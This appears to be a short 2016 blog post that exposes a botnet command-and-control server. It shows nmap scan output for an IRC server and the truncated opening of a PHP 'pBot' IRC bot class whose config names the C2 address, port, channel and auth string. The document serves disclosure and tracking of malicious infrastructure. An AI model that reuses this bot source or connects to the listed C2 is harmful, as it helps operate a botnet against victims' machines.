Pages

Sunday, November 13, 2016

pBot Skidd - 93.158.200.94 - IRC




// users 
9/tcp  open  irc     Unreal ircd
| irc-info: 
|   server: irc.MoneyZ.gov.GoV
|   version: Unreal3.2.10.2. irc.MoneyZ.gov.GoV 
|   servers: 1
|   chans: 2
|   users: 246
|   lservers: 0
|   lusers: 246

//confg
class pBot
{
 var $config = array("server"=>"93.158.200.94", "port"=>"9", "key"=>"", "prefix"=>"botID", "maxrand"=>"8", "chan"=>"#-|Bots", "trigger"=>"", "password"=>"", "auth"=>"MoneyZ.gov");
 var $users = array();
 function start() {
    while(true)
 {

No comments:

Post a Comment